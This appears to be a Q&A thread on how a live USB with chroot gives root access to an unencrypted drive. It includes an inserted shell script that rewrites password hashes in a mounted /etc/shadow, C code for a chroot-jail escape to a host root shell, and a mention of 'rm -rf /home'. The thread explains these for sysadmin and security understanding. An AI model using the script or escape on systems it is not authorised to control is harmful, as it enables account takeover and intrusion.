4

If you were to use an Ubuntu live USB and run the commands below, is this literally just giving you root access to the drive?

sudo mount /dev/sda1 /mnt
sudo chroot /mnt
john smith

4 Answers

8

Physical access is root access as Zacharee1 indicates. This is why people with sensitive data restrict physical access.

To break your commands down a bit though, mounting the drive is what prepares the file system and gives you access.

sudo mount /dev/sda1 /mnt

After that mount command you can access all unencrypted data on /dev/sda1:

ls /mnt
cp /mnt/some_data /your_usb

etc

A word of caution: if someone had physical access, encryption may not be sufficient to protect the data, as people can leverage physical access to break the encryption. "Evil Maid" is but one example, see https://www.schneier.com/blog/archives/2009/10/evil_maid_attac.html

The chroot command switches so that now you are running commands as if /dev/sda1 is mounted at / or root, assuming /dev/sda1 is a valid root file system and not /home or a data partition.

The chroot command has many uses above and beyond data access.

So after the chroot command, the commands you run in the shell now affect /dev/sda1. So if you change the password or system configuration, it affects /dev/sda1 and not the usb.

So, for example, if you run

passwd

the password you set affects the root user on /dev/sda1 and not root on the usb.

Some virtualization technologies, OpenVZ and LXC for example, are similar to a chroot but have additional features.

For additional information on chroot see

https://help.ubuntu.com/community/BasicChroot

chicks
Panther
6

Unless the filesystem is encrypted, you have full access to every file on an offline drive (i.e. from the LiveUSB). You can do whatever you want without having any user's password from that OS.

The LiveUSB method is one of the most popular ways to bypass passwords on both Windows and Linux, as it allows a user to set a local administrator password in Windows and a root password in Linux by replacing files or running some commands.

It's pretty great, as long as you're the one with hardware access and not someone you don't trust.

EDIT:
Thanks to bodhi.zazen I now know that, even with encryption, you can gain access to a filesystem. You do need the unwitting interaction of someone who knows the encryption key, but it's still a method for access.

Read about it here: https://www.schneier.com/blog/archives/2009/10/evil_maid_attac.html

EDIT 2:
Apparently there are a lot of ways to access encrypted filesystems.
https://www.schneier.com/blog/archives/2008/02/cold_boot_attac.html

I guess the lesson here is don't give people your hard drive.

TheWanderer
  • Take care: with physical access, encryption can be broken; see https://www.schneier.com/blog/archives/2009/10/evil_maid_attac.html and https://xkcd.com/538/ – Panther Mar 14 '16 at 13:15
  • @bodhi.zazen Wow, that's pretty interesting. I'll edit that in. – TheWanderer Mar 14 '16 at 13:16
  • A few questions on this. So you are confirming that this is giving you root access? Ok. What I don't understand is how chroot'ing works on systems with a different OS. For example, on an Arch Linux live USB, you have to do an arch-chroot to be able to mount it (I tested this on my Arch machine). But on an Ubuntu live USB it's just the commands stated in my initial question. I am wondering what the difference is? If it's OS dependent, does this mean I could use the Ubuntu live USB to chroot into my Arch hard drive? – john smith Mar 14 '16 at 13:23
  • "Evil Maid" is not the only method to circumvent encryption mind you ;) https://www.schneier.com/blog/archives/2008/02/cold_boot_attac.html – Panther Mar 14 '16 at 13:24
  • @johnsmith I don't believe it's OS dependent. I think it's just that the two OSes have different commands to do the same thing. However, that's a little beyond my knowledge. You could ask that in a question on [su] though :). – TheWanderer Mar 14 '16 at 13:27
  • @bodhi.zazen editing – TheWanderer Mar 14 '16 at 13:27
  • @johnsmith - a chroot uses the kernel on the USB, but you run Arch-specific commands in the chroot, so pacman rather than apt to install on an Arch chroot. See the information I gave you and ask another question, as now you are starting another question in the comments. – Panther Mar 14 '16 at 13:32
  • Ok thanks, i will do some reading first, and if I get stuck I'll ask another question. Just realised your reply below! – john smith Mar 14 '16 at 13:35
  • Can you tell me something on this topic though, why, when you do the sudo command from the live USB for the mounting and chroot'ing that you don't need to punch a password in? Is the password setting on the live USB just unenforced? If so, why have they installed sudo on the live USB? It seems pointless. – john smith Mar 14 '16 at 13:44
  • @johnsmith Since the LiveUSB doesn't have any passwords set up, it can't ask you for one. sudo is still there as a protection measure, just like it is in normal Ubuntu. A user who doesn't know what they're doing might open a terminal and run rm -rf /home, which won't work without sudo. Even if there's no password needed, it's still an extra step to prevent accidental mess-ups. – TheWanderer Mar 14 '16 at 13:48
  • @johnsmith - The live CD is intended for testing hardware, system recovery, and installing, not to function as a secured installation. The live iso does not have security updates, ever, for example. – Panther Mar 14 '16 at 15:57
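A worked version of the offline edit that TheWanderer's answer ("replacing files") and Panther's chroot-plus-passwd walk-through both describe, added here as an example; it is not code from any of the answers above. It does not chroot at all: with the target root filesystem already mounted (assumed at /mnt) it rewrites the chosen user's entry in /mnt/etc/shadow directly, which is all that "physical access is root access" means in practice. The hash is produced beforehand with `openssl passwd -6` (or `mkpasswd -m sha-512`); the mount point, the user name and the standard colon-separated shadow(5) layout are assumptions of the example. On a system with shadow-utils, `passwd -R /mnt root` gives the same result without a chroot.

```shell
#!/bin/sh
# Added example (not from the answers above): offline password reset against a
# root filesystem mounted from a live USB. Assumes MOUNT/etc/shadow exists in
# the usual colon-separated format and that the caller can write to it (the
# passwordless-sudo live user, via sudo).
#
# Usage on the live system:
#   HASH=$(openssl passwd -6)            # prompts for the new password
#   sudo sh -c ". ./offline_pw.sh && offline_set_hash /mnt root '$HASH'"

# Print the hash field (field 2) of USER's entry in SHADOWFILE; fail if absent.
shadow_hash() {
    shadowfile=$1; user=$2
    awk -F: -v u="$user" '$1 == u { print $2; found = 1 } END { exit !found }' "$shadowfile"
}

# Replace USER's password hash in MOUNT/etc/shadow with HASH.
# Keeps a .bak copy, touches no other line, and refuses an empty hash
# (an empty field would mean password-less login).
offline_set_hash() {
    mount=$1; user=$2; hash=$3
    shadowfile="$mount/etc/shadow"
    nl='
'
    [ -f "$shadowfile" ] || { echo "no shadow file under $mount" >&2; return 1; }
    shadow_hash "$shadowfile" "$user" >/dev/null || { echo "no entry for $user" >&2; return 1; }
    case $hash in
        ''|*:*|*"$nl"*) echo "hash must be non-empty and contain no ':' or newline" >&2; return 1 ;;
    esac
    cp -p "$shadowfile" "$shadowfile.bak" || return 1
    # Rewrite only the matching line and, like passwd(1), set field 3
    # (days since last change) to today. Writing through '>' on the existing
    # path truncates in place, so owner and the 0640 mode are preserved.
    # Note: a locked ("!...") or disabled ("*") account becomes usable again.
    awk -F: -v OFS=: -v u="$user" -v h="$hash" \
        -v today="$(( $(date +%s) / 86400 ))" \
        '$1 == u { $2 = h; $3 = today } { print }' "$shadowfile.bak" > "$shadowfile" || return 1
    # Verify the write landed before reporting success.
    [ "$(shadow_hash "$shadowfile" "$user")" = "$hash" ]
}
```

Nothing here works if the mount step itself failed, which is exactly the situation with a LUKS-encrypted root: the protection comes from the encryption, not from the account password, and the Evil Maid and cold-boot links in the answers above are about getting past that layer too.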
3

Chroot is not what gives you root, sudo is. Most livecds have sudo configured such that the default user on the livecd has unrestricted no-password sudo access. Typing "sudo bash" instead would have given you just the same permissions but with a different view of the filesystem.

So yes, if you can boot a livecd and the hdd is not encrypted, you can easily bypass any file permissions and read/write whatever you like, but chroot is not what enables that; booting the livecd, which contains a system on which you can trivially get root, is.

Peter Green
1

Let us say you are asking the following question: "If I gave somebody permission to run sudo chroot /mnt, can they get root on the host?" The answer to that question is yes.

Besides the obvious hard way involving mknod(), there's an easy way if they can get a compiler:

#include <fcntl.h>
#include <unistd.h>

/* Classic chroot escape; chroot(2) needs CAP_SYS_CHROOT, i.e. root inside the jail. */
int main(void) {
    int n = open("/", O_RDONLY);          /* keep a handle to the jail's root directory */
    if (n < 0 || chroot("/bin") < 0)      /* move our root below the directory we hold */
        return 1;
    fchdir(n);                            /* cwd is now outside the new root ...        */
    for (int i = 0; i < 64; i++)          /* ... so ".." is no longer clamped: climb to  */
        chdir("..");                      /* the real /; one step suffices for /mnt     */
    chroot(".");                          /* make the real / our root again             */
    char *const argv[] = { "/bin/sh", (char *)0 };
    execv("/bin/sh", argv);               /* shell on the host filesystem               */
    return 1;
}

Chroot jails do nothing if the attacker has root.

Joshua